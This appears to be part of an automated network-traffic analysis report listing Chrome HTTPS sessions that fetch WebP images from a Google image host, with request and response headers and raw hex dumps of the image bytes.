                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 0d af 14 a5 75 f0 2d e7 7f 03 50 63 e3 3c 4c f4 e4 73 1c 91 58 d9 dc a3 f5 c6 99 bc d1 7b a1 8b 60 96 5d ad d1 84 88 18 57 f2 c3 4c e0 41 cf a2 e0 ff e2 ef 40 18 e2 fb b9 ac 4d 17 d7 3f fb 78 4e 7f b2 ac 82 47 a6 ff 4f 54 c4 91 27 ce 74 67 a3 35 cf 0c e9 7b 54 7d 7f 7c 25 95 4e 2c 42 11 b6 d7 69 95 cd 70 59 23 c1 53 dc 50 44 60 00 d8 39 b9 94 d0 9a fa ab 3b 1f 08 33 e1 e5 93 92 f4 24 80 ae cb a8 ee 8b 92 69 27 46 9a 2c 35 e2 f5 2e 3e ce b6 7c 47 e3 77 d6 78 ff 94 87 24 94 f5 ed 18 06 fe 41 e4 d4 af 8b 68 f2 8e 37 e6 ee b7 e1 06 ac 30 4c e2 39 48 91 48 b5 2c 84 07 62 84 ba 62 85 68 b2 6a 0f 2a ed 0e 1a 83 95 de 38 a3 ae e4 4f 67 df 68 aa d5 a1 64 59 fd 9b b0 e0 d0 b7 e9 8c e4 ee 2d 09 97 6e 60 f5 03 14 30 dd 06 03 e8 3d 36 c6 15 6d 37 0e 9d fb 0a 6e 95 7e
                                                                                                                                                                                                                                Data Ascii: u-Pc<LsX{`]WLA@M?xNGOT'tg5{T}|%N,BipY#SPD`9;3$i'F,5.>|Gwx$Ah70L9HH,bbhj*8OghdY-n`0=6m7n~
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 44 a9 2b ab b1 ab b2 9e 63 d4 9b e7 d4 a4 b6 12 3f 5b ec 79 2c 9b c0 44 e6 a9 34 8f bc e6 8b 58 0e 33 ad ff 13 7a 2b a7 76 50 d7 f7 15 61 16 d8 f8 00 f7 a2 49 b9 11 4e d7 c6 8e 51 eb 93 f0 d2 23 af bf d3 c4 73 c0 f8 7b 56 d2 6a 3d 43 c1 dc d4 8f bc 5c af 85 f2 c5 3e 42 6a 9a fa 32 dc 24 31 69 b0 15 b9 5f 52 54 53 ac db d4 c4 bb 8a cb ec 0f 41 0d 51 96 40 53 b2 d8 be 1d d6 06 de c8 ee ab e6 9a db 54 7c b7 4d 52 65 cc 65 80 00 00 fe fd d9 3b 33 37 d6 29 b2 4f b4 d6 0c 70 71 60 75 a5 c0 02 84 df af ce c6 f1 ec 49 29 42 cc e9 7b 80 1e bc 7d f7 73 7c dd c3 55 1c b8 6a 9f bb 67 53 b4 9a fa 45 d1 9e ee 6c 59 69 d4 f3 ec f0 9f 91 b8 07 4b a6 e1 a0 46 89 b4 01 00 f6 a6 71 02 18 3e 7e 19 99 d9 6e c5 20 bf f7 e1 f3 f1 0b bb 51 29 2e e6 a7 86 d3 c5 cf 45 fa 2d 44 e8
                                                                                                                                                                                                                                Data Ascii: D+c?[y,D4X3z+vPaINQ#s{Vj=C\>Bj2$1i_RTSAQ@ST|MRee;37)Opq`uI)B{}s|UjgSElYiKFq>~n Q).E-D
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 9f ac 1b 62 0f 95 a2 24 cf 6c 63 58 8f 47 32 19 44 71 10 e5 1d 7a d1 32 bc c5 75 86 65 65 1f a0 ef bd 63 bd 68 79 63 02 ae f5 f8 68 f1 98 c3 04 5d 2a 1d c9 5a 6a 5b a8 db f3 39 a7 d8 66 d9 b0 01 c8 ff e9 95 38 45 f5 9d 94 d5 c8 9f 6f 28 af 31 e1 a3 85 e2 83 7e 18 b8 43 b5 91 47 b5 33 ff 48 4e 60 98 ed 19 1d 13 fd 2b fd ae 8d 0e a5 1b 89 fb c9 c4 e0 78 7a 20 d3 ad 82 5b e7 2b 88 ac 37 13 e4 df 86 59 07 a5 f6 c1 46 42 c9 ff 8d 48 e0 4c b9 4c d7 36 29 9c fd 26 6f 8a c9 e6 f5 b1 69 8a 94 87 13 05 c7 1b 70 be 14 85 5b ed 34 08 6a 87 ee b2 41 7e d5 9f a9 40 5f d6 d8 7e 8d eb a9 39 17 29 f6 32 be fa 1b 68 31 c4 f0 16 87 dd e1 8d 05 4b ee 69 ac 5f 69 f6 62 72 4c ca b1 34 b3 8e 44 f5 7a 9a bf 48 d6 1c c5 dd ec 69 b4 cc ae 69 63 d9 6a c8 7e 9c 77 ae 86 f3 44 12 b1
                                                                                                                                                                                                                                Data Ascii: b$lcXG2Dqz2ueechych]*Zj[9f8Eo(1~CG3HN`+xz [+7YFBHLL6)&oip[4jA~@_~9)2h1Ki_ibrL4DzHiicj~wD
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 0a 48 b2 f5 59 d1 ba fe 05 d9 ce 19 b7 a6 65 d3 c3 62 6c e2 d7 8f 5b fb ce 72 b6 08 3a 95 ff f1 2d 50 d6 fe 68 fc 37 88 e0 c7 cf 50 41 a6 31 a7 c3 c5 fa 63 bd 7c 92 9e 3f 09 ee f8 8a 34 2a b9 e6 14 12 6c ff 75 a0 7f 73 29 d7 e3 04 f2 2b b1 25 71 ae b4 35 34 9c b3 de ed c3 2f 63 da e0 b5 ad 1b 68 fc af 52 c5 59 76 51 cc 2d 1d bd c9 33 de fb 78 1a 4d d1 97 aa 07 dc cb ff 94 a0 fd 02 33 b9 d0 be 88 c5 f7 a2 7b 03 fe 24 b9 f7 1f b5 d4 d5 d2 26 63 6f 4f 66 07 5c 59 cb 4d 31 a7 ec a2 c1 81 55 a5 63 c6 92 1e 17 1f 37 b2 e4 05 60 9e 41 b0 de 2e 65 ee 19 e1 d3 48 2d f6 95 0e 86 3e 1c e5 e0 c8 fe 67 06 54 3a b2 2a 62 83 a4 ee 6a e3 30 4e 64 7a 97 e6 a5 ed b6 42 c5 df 70 75 27 b0 49 76 c5 9f 35 48 32 0f a6 cb 32 d6 b8 8c a1 ef 54 6d 35 36 0e 39 49 97 39 3d c4 87 9b
                                                                                                                                                                                                                                Data Ascii: HYebl[r:-Ph7PA1c|?4*lus)+%q54/chRYvQ-3xM3{$&coOf\YM1Uc7`A.eH->gT:*bj0NdzBpu'Iv5H22Tm569I9=
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 7d 1c 24 3a d0 23 87 af 11 c4 1e 58 fc bb 21 34 e7 20 66 99 d2 b8 c3 7c 00 b9 50 4e 8a 1c 99 bd 5b b6 2d ce ef 71 69 bd da e0 f0 73 b3 19 22 1d 6f 17 b3 cf 5c 26 5f f4 a8 28 9e f7 27 ce c7 96 34 f9 97 fc 0d 9d 1e 72 cc 4c 0b 28 17 f9 d0 48 42 eb ad 18 9b 9d f0 29 a7 59 67 ae 6b f6 63 57 9a ca bc ab 29 e0 43 cc 3e 48 78 5f 2b 5a b3 d1 86 35 7d 48 dd 30 a8 23 61 15 f6 93 eb df 63 87 97 a7 c3 fb 6b d9 ee a3 81 94 fc 77 ba 38 ac 85 bf 91 a9 45 51 b4 a8 12 c5 4a b5 05 59 b6 10 5d b5 f3 52 e1 13 93 f4 2f 8c 8a 7f f3 7d 39 43 a1 24 d1 05 8d 3d 58 5f 13 cc 27 04 b5 02 94 d8 3c 99 49 10 d7 6d 7b 17 dc 14 7f 9f fb 61 51 93 c2 c0 03 88 a3 ce 1f 3c 33 fa 57 3a 40 25 ca 65 65 44 91 a4 f5 6e 2c 9a e7 81 92 7d 53 fe f9 71 ea c7 63 44 fb 08 16 3b 58 24 a1 da 44 b4 a1 fa
                                                                                                                                                                                                                                Data Ascii: }$:#X!4 f|PN[-qis"o\&_('4rL(HB)YgkcW)C>Hx_+Z5}H0#ackw8EQJY]R/}9C$=X_'<Im{aQ<3W:@%eeDn,}SqcD;X$D
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 03 04 be 22 a5 ac 2f 2e 08 e0 a5 b9 31 8b f5 6c a1 b5 8a a8 da 33 2e 5a ab 8f 4f 9b 47 27 e8 dc 3e c1 64 65 93 bd fe 60 41 c0 e5 8c 19 ee c8 2c 66 44 39 5e 95 03 4d 77 6c 98 df 4f ee bf ed 9a 46 d2 e3 99 90 92 73 c7 e8 0b 76 96 5f 54 fc 10 46 dd 4b a6 7d 32 f5 18 aa f7 92 e8 6b ba a7 63 eb 8d 37 69 68 db 3c 1c 45 76 c3 84 13 7e 9e 99 ef b9 6a 35 ae 57 55 c4 75 be a0 a8 5d 48 c4 e2 0b 65 d2 f5 d5 30 e8 4a b4 b6 cb 19 b5 a9 46 68 72 af 5f f0 71 33 ac 2a a0 f3 7c d9 0b 5a 32 2c 9c 9c 3d 1e 2e 77 88 8c 41 13 c2 82 2c 44 bd c1 3a 2b ea 92 80 95 01 c4 2f b4 0b ac da 4f 86 60 ef 07 d2 ac ec 87 c3 f6 77 c3 0d 0e 51 4d 00 26 3a b9 e0 89 5a ad 2c bb 70 70 9e 78 ea f3 6a 6b 4b 8e 8c ad 7d aa 0f 40 5e 7d 94 f4 2b 8d 6d ab 7e 8c fb 54 b2 75 c6 65 eb 79 51 e8 d9 6d 32
                                                                                                                                                                                                                                Data Ascii: "/.1l3.ZOG'>de`A,fD9^MwlOFsv_TFK}2kc7ih<Ev~j5WUu]He0JFhr_q3*|Z2,=.wA,D:+/O`wQM&:Z,ppxjkK}@^}+m~TueyQm2
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: c6 71 67 40 b9 fa 11 af 67 f5 12 93 de 1b 85 60 a2 96 90 dc 05 89 b2 d8 47 53 eb b9 28 ac f2 fb ff d2 6a b4 e1 ae 3c a2 6d 49 94 82 16 fc f3 41 2a cc 61 91 aa 46 bf 51 9d f4 b9 15 88 80 11 fb 9e c4 f5 c4 b6 b4 46 4b d7 2a f5 5f 14 b6 4a 7e 3c a6 9f 5c 60 c6 0a e0 a0 a9 19 fe 29 4d c3 57 27 bd 14 a7 f5 24 df 41 7a c7 b1 80 c4 96 08 5e ad 82 24 a9 c3 49 17 6f b7 23 9c 8d 60 50 f1 c4 9a ef 6f 69 0b cc 56 d5 20 89 f4 bc 20 b8 40 22 72 d3 1e e6 07 8a 74 8a e5 1a 67 72 5e 6d 2b 15 34 5b 46 01 ec 42 6f 17 01 00 6f 40 98 57 d8 05 74 fd b3 02 32 1d 4d e0 50 fd 73 de a9 eb 45 00 51 a0 cd f4 e5 81 ac 42 7e e8 0a 4a df 16 4c c3 df f7 21 f7 1a a0 f1 da b5 87 2b 22 f5 fb 22 13 af b7 ca 48 3e 9b 7b 80 88 d5 86 ce 31 af 88 85 4d b4 6e 2d b2 30 2e 75 71 df 5c 44 83 bd 80
                                                                                                                                                                                                                                Data Ascii: qg@g`GS(j<mIA*aFQFK*_J~<\`)MW'$Az^$Io#`PoiV @"rtgr^m+4[FBoo@Wt2MPsEQB~JL!+""H>{1Mn-0.uq\D


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                108192.168.2.449996216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC524OUTGET /VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s52-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 2956
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:16:17 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:16:17 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 2305
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC857INData Raw: 52 49 46 46 84 0b 00 00 57 45 42 50 56 50 38 4c 77 0b 00 00 2f 33 c0 0c 00 09 33 6d db a8 ed 4e f3 67 3c 0e 11 fd 4f 08 46 0e cb 15 d5 d2 44 b9 24 fe 82 6d 24 49 4e fa 05 5a 6b 4c f2 8f 8e 08 70 49 81 6d 23 49 8a 2a ff 08 2f 00 e6 37 d1 10 90 24 d2 ff cf f5 3f 81 7c f1 8b 3f 15 40 25 e8 3d 1a 3b 35 73 78 8d cf d7 2d f8 28 79 6e a6 fb ff 05 80 1b 70 47 f8 33 78 da b6 ed d8 2b da d6 f6 eb 79 d5 92 96 6e db b6 dd 7b 0d 43 25 db 46 c9 b6 6d 1b 55 db 46 b7 6d bb f7 e6 b4 e4 7d df e7 2a 24 1d 3f e1 bc 29 c9 b6 6d 37 52 d6 b9 4f 52 66 01 f5 e9 12 f4 98 1f f3 2f 52 d2 3b 9e 68 db 36 6d db da b6 5c fb 98 6b 9d b5 f7 b5 6d db b6 1d ba e9 86 6c df f0 89 5e df b0 6d 23 68 db b6 6d df ad 89 a1 de 62 02 6e fd 5f 89 06 3d 3a d0 31 c7 c8 d8 8f 79 18 31 b1 9a c5 51 8e ee
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8Lw/33mNg<OFD$m$INZkLpIm#I*/7$?|?@%=;5sx-(ynpG3x+yn{C%FmUFm}*$?)m7RORf/R;h6m\kml^m#hmbn_=:1y1Q
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 5a 76 97 7a d6 1a 16 ec 52 cf 71 62 3a 15 fa 20 54 08 08 45 42 11 84 84 02 cb cb ef fb 3d c2 66 56 93 e1 87 d7 fc 3d e7 a7 d8 3f 57 db b1 48 5e 9b e9 ab af 77 31 b2 23 a0 e0 2f 5a 52 76 97 ae b4 ee f3 9c 60 e2 25 1f 97 91 95 95 3e 58 28 12 24 14 6b 40 d1 92 20 4c fd ff 23 b7 e9 58 24 2f cb f4 d8 eb a3 6c 5f 7c 3f 6a 4a b0 95 87 5c af 63 61 47 81 46 f9 63 82 16 08 25 6d 73 b7 ad 2c 78 cd 0a 8d 02 45 58 98 c7 60 e4 c2 f7 df 8f f9 ff fb 91 f7 56 47 82 6b c9 5b 6d fe 3e 97 fb fe f7 d6 1c 33 b3 bd 74 3f 74 0e ac d2 fe 36 79 ec f5 21 96 d7 cd 7e 92 96 4d 1b c7 8c 4c 04 14 b1 26 53 86 d0 c2 e7 f7 5b be 8e 05 79 c7 2c 01 45 28 66 a6 c1 f6 9b d7 af be d1 ee 49 72 07 9a a0 92 31 25 1f 49 7e 2c 57 66 64 fa 92 f9 8d 9a e4 75 51 1f ef fb b4 eb 83 cc ef 30 11 88 2f ea
                                                                                                                                                                                                                                Data Ascii: ZvzRqb: TEB=fV=?WH^w1#/ZRv`%>X($k@ L#X$/l_|?jJ\caGFc%ms,xEX`VGk[m>3t?t6y!~ML&S[y,E(fIr1%I~,WfduQ0/
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC709INData Raw: c3 ce c9 d6 a9 ad e3 ad cd a9 0d 48 49 16 ac e5 12 5b c5 f6 e1 fb 64 66 e2 ad b3 70 05 90 b3 e7 1d f2 ef f3 a5 85 50 93 e1 8b df 8f cc 1c 30 06 72 5e 76 8c 2d 63 6b 38 75 92 d2 4a 5a 48 69 93 6c e4 83 7e f4 57 ef ff 96 34 93 fc e7 8c 5c ea bc 35 48 81 62 c3 9f ce 33 4f 4d 25 3b cb 53 de 47 3c a9 2f 68 ce cb 79 63 cb 29 49 eb 0c e5 88 86 56 6f f6 fb 1f da 2f fd d4 f7 d2 5b 4a 4e f9 aa b9 03 97 38 07 6b 0a 14 0d 8a 0d 9f bc 5f bb ee 71 2b e4 3e fb 0e 47 4c 2c 29 d0 24 7b 66 76 ec 19 5b c6 29 39 e1 26 c7 5c e7 0a 6f e1 7d fc cd fb 91 4f 7e 1f b1 3d 96 95 cd b2 c3 6f 9d ef e4 ce fc 1b 04 24 59 83 a2 29 9a 62 cd 8a 07 ec 3b 75 20 33 8f 7a 1f f6 e9 cf f7 3f 90 5f 5c cd 9f 4f 72 ee c4 7f 76 76 b3 be 67 d6 f7 fa 9e ec d8 cb 5e 9b b5 bd 56 4e 6f 5c e1 42 2f 73 07
                                                                                                                                                                                                                                Data Ascii: HI[dfpP0r^v-ck8uJZHil~W4\5Hb3OM%;SG</hyc)IVo/[JN8k_q+>GL,)${fv[)9&\o}O~=o$Y)b;u 3z?_\Orvvg^VNo\B/s


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                109192.168.2.449998216.58.206.864432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC529OUTGET /xNx9CfCzg_VugRMv3rIxVd-GjLRx6_dIXGfTlrKqJwkZCPg_w-ZZNosQT46MYIoo_Q=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 12738
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 02:51:53 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 7369
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC856INData Raw: 52 49 46 46 ba 31 00 00 57 45 42 50 56 50 38 20 ae 31 00 00 b0 9b 00 9d 01 2a a6 00 28 01 3e 65 28 90 45 24 22 a1 97 5b c6 88 40 06 44 b5 00 68 65 19 7f 73 fc 8c ed d8 fa 1d f7 fb 6f ec ff e6 77 cc 85 89 fc 0f f7 9f d3 bc ab 55 57 96 df 3a 7f bf ff 1d f9 17 f3 2b fd 27 fb cf ef 1e eb 7f 41 ff cc f7 03 fd 4a ff 8f fd 97 fb f7 64 3f dc ef 50 7f d2 7f cf 7e db fb bb ff af fd 96 f7 85 fd f3 d4 0f fa 9f f9 cf 5b ff f8 1e c8 ff e0 bf da 7f ff f7 03 fe 81 fe ab d3 57 f6 e7 e0 fb fb 07 fb bf db df 81 6f d9 cf ff 5e c0 1f f8 bd 40 3f ee 71 40 7f 65 f4 5d e0 cf e2 bf 2b fc f3 f2 6d ea ff 70 7d 88 72 4f da 47 fa 5e 88 ff 33 fb d3 fb af f0 5f ba 1f 14 ff a0 ff 73 e1 7f ca 9f ee fd 42 3f 22 fe 7b fe 5b f3 3f ca c7 ba b2 dc 7a 05 fb 31 f5 3f f6 df de 7f 77 ff d9 7c 2e
                                                                                                                                                                                                                                Data Ascii: RIFF1WEBPVP8 1*(>e(E$"[@DhesowUW:+'AJd?P~[Wo^@?q@e]+mp}rOG^3_sB?"{[?z1?w|.
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: 41 f7 43 3b 0d 9f 22 b1 63 49 bc 22 a7 bb 7e b9 a7 bb 0c 0f 8a 93 d8 8c 74 6c 5d f6 10 72 3c 5e 09 db ec c4 4e 4f 33 ba 2d 03 c5 2e 5e 79 d8 f3 9c 6f 21 a9 01 b2 51 80 14 d5 cb 74 c7 2c b2 45 10 fb 8d 8b ee b4 7e 54 56 d1 17 97 ec dd cd 79 0e 3a ce 37 55 0d c4 a5 82 69 bb 6b 3a cb 85 a2 71 86 f1 96 41 7d 94 df 9a 1c 8f 3b a7 d6 0a 0e 89 a4 5c dc 61 40 65 69 c7 0d 49 9e ff 3c 47 5f 40 18 6c cb a8 56 a3 69 66 96 08 ca 2b f4 6b ac d8 4c 9d d3 78 6b 97 8a 4e 64 c9 46 ed 2c ee 00 67 2d 0e a4 dd ed dd 50 7d 96 aa 51 b4 53 33 0f 3e a1 14 2e 4a 4a cf 6e 32 99 8a 47 80 81 cb 96 0b 20 9b a2 67 5c 18 42 78 ef b5 5f 42 7f 5f c6 02 1e 46 a0 c3 d7 fb 06 61 65 ab 8e b9 0d 70 ef a7 9f 3f 45 03 32 d7 f9 a4 8c ce 19 1e 2a 88 f2 b3 21 83 7c 3a 2b 90 dd 54 a1 2f ee 7d fe 76
                                                                                                                                                                                                                                Data Ascii: AC;"cI"~tl]r<^NO3-.^yo!Qt,E~TVy:7Uik:qA};\a@eiI<G_@lVif+kLxkNdF,g-P}QS3>.JJn2G g\Bx_B_Faep?E2*!|:+T/}v
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: c0 5b c9 56 d0 51 48 a2 65 9b f2 90 7c de 4d ce 82 26 06 df f7 d2 f3 42 97 9f 8d 6f 20 a1 85 27 fe 1d d7 b9 6b 05 60 ce b4 71 f1 b1 b6 a3 65 18 9c 62 29 c1 38 89 52 17 81 44 dd 90 4f 96 3b 8e a9 cb 70 5a bc 3f d2 a2 ef 83 82 f7 28 b4 db 2a ae ab 85 b0 2a 87 bd 6f 7b f4 27 0d 2d 9b 7a 9a 06 9c 5d 1b 93 83 89 84 ff 07 56 3c f1 0c a2 84 9e 91 f3 7e 5d 84 e2 11 65 89 da 21 15 ef c9 d8 2d a6 0c 08 f6 9e 93 aa 35 b9 59 5a 92 0d 54 4a ba 11 55 dc e4 ed 64 9d 44 b8 7f 07 72 91 91 8f 87 06 4c 39 8b 38 8e 2e 0d 8a 01 fa 58 98 be cf 1b 5a 7e 9f f2 ac 9a 0f d3 a2 bc 23 84 87 96 65 ae 69 6f dd 29 a1 8c 80 33 e4 a4 96 5e b8 ab c7 ee d8 ee 45 d6 3d ea 9c a7 68 66 d9 c2 ed 2a b5 d8 e4 dd e4 9a 44 bf da c0 87 bb 5b 0a d6 21 77 63 b5 00 c8 26 68 da 90 db 25 77 31 2a 5e 8a
                                                                                                                                                                                                                                Data Ascii: [VQHe|M&Bo 'k`qeb)8RDO;pZ?(**o{'-z]V<~]e!-5YZTJUdDrL98.XZ~#eio)3^E=hf*D[!wc&h%w1*^
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: cc b0 69 5c 44 1f f3 f8 e6 2f 9d 81 d1 ed 9f 2a c2 62 9b 29 d8 a7 6f 82 bf d7 0e 70 f7 61 b4 a0 66 ef 1f 48 49 ea cb 60 22 9a fb 10 e8 9d f3 6c e8 af b0 d8 c1 0b c9 fe 73 99 28 0e a5 19 88 52 89 f2 6a fc 60 d4 35 57 30 6e 2c eb 3d b2 f8 fe d9 1c 53 1e 56 7b ff 9a a8 8b 7a 98 c1 db 1e 96 25 1b bd 7d c0 db d0 c2 5a 92 07 d5 7a 06 ef bf 9f 26 ec a6 ee 2c f9 d5 c4 92 52 2b 21 c0 26 3e 02 97 14 dd 4f 98 d2 6f 1e 3e 23 72 47 97 c1 ed 43 3d b6 53 be f1 05 56 f6 2a 40 3c e1 08 ca 44 52 db ff 23 fe 58 24 32 d9 f7 d4 93 fe ed f8 d3 12 df 33 90 96 bf 2f c8 9e ba 12 57 1a be 37 c0 65 2c 63 fc 3b 96 8a be 83 68 31 c4 3f d1 9b 6c 42 ef 34 c6 59 48 42 12 ff 49 3c b1 a1 6e 48 0f 8e e3 64 8c a5 89 59 a4 19 09 f4 c3 d1 84 30 4c 04 59 e5 b5 56 0c 8b a3 d8 2b 81 73 8d a2 fc
                                                                                                                                                                                                                                Data Ascii: i\D/*b)opafHI`"ls(Rj`5W0n,=SV{z%}Zz&,R+!&>Oo>#rGC=SV*@<DR#X$23/W7e,c;h1?lB4YHBI<nHdY0LYV+s
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: b1 23 1f c5 60 5e 1a 90 3a 3b 9f c3 cb 2f 5a d0 0c a1 11 01 ae cc e4 44 e1 36 63 e2 1f 95 fa 4f dd 8c 8b f7 84 9d 35 b1 a7 fb 79 ae f1 8c d8 f0 6e 9e ac dc d4 f4 38 f3 c7 b7 43 d8 a0 06 84 95 86 4f a6 ad b2 25 dd 4c b5 68 0c 3f 2f 9e ec c7 37 ca a6 63 8c 2a 17 e7 28 f8 67 98 55 cc e2 e2 3d 7d 76 26 68 4b 00 64 c5 8f f0 b6 3d c2 23 73 00 fc 6d e6 1d e4 de db 25 98 eb 3d f8 d7 c8 e5 91 2a 42 43 68 ff 67 3b e1 0b 80 6c 6e d3 c3 82 ed 47 16 37 df 3b 1f 90 76 25 d6 e3 b4 2f 51 d0 11 84 8b ab 21 0c aa 20 62 ea 2b 9c de fe 02 f3 34 ec 2b ba 23 2f 56 7d cf 99 31 ff c9 9d a2 4b 5b 06 fc 88 4e ac 15 05 b0 a9 af b9 80 42 7c 72 6b 78 e4 31 ae 0a 8d dd ba c4 88 d6 09 5d 7c 24 bf ae 07 cb 17 72 cf a9 1e f5 ba ab 98 79 f1 1d 55 ef f4 b8 b1 99 14 8b 5e 05 cf 68 4a 42 37
                                                                                                                                                                                                                                Data Ascii: #`^:;/ZD6cO5yn8CO%Lh?/7c*(gU=}v&hKd=#sm%=*BChg;lnG7;v%/Q! b+4+#/V}1K[NB|rkx1]|$ryU^hJB7
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: 19 04 dd 5f 3e 5d e0 1f 0c 84 3d 56 b9 79 9a e1 72 c1 af fa d8 b3 b8 37 27 81 0d 80 e8 c9 08 64 70 83 b9 53 d9 e6 cf a7 14 ca b5 10 1d 17 45 03 94 8d 62 5b 57 5b 27 02 59 2b 70 d9 32 7c c6 9d 19 76 b2 ff d0 41 27 2b 22 92 10 40 99 52 ab ec b7 f1 c0 cf 73 04 7f 00 28 ae 13 43 62 4f 6d 0f 07 de 49 05 a9 b4 7a d1 5a 36 bc 6b 01 13 60 0d 4e 9e 89 dd 59 ea 03 8b 30 57 e5 08 a1 d7 fb da b9 d3 00 b9 36 8e e4 f7 b0 22 f5 66 3c 8c 5b 1a 9c f3 e6 37 b2 ff c9 a4 dd 51 31 6b d0 84 9b 8b 2f a3 52 95 aa cd 62 e0 cd 6d 63 d2 d7 2b c2 08 d9 8b 87 f2 15 50 26 9a b8 f3 cf 04 6f ac 6a 0e 4e 0c d9 4a b4 66 35 17 41 12 10 6d e4 b4 bd af 07 08 ff 1d 63 54 df 3d 51 3b 34 8f 57 ac 15 a7 fa 2b b3 d1 9b 4a d3 81 b6 d1 e3 0f 5d e8 d3 80 92 07 3d 2e 16 3a 2d bb ca 32 c2 e7 9b 8f e0
                                                                                                                                                                                                                                Data Ascii: _>]=Vyr7'dpSEb[W['Y+p2|vA'+"@Rs(CbOmIzZ6k`NY0W6"f<[7Q1k/Rbmc+P&ojNJf5AmcT=Q;4W+J]=.:-2
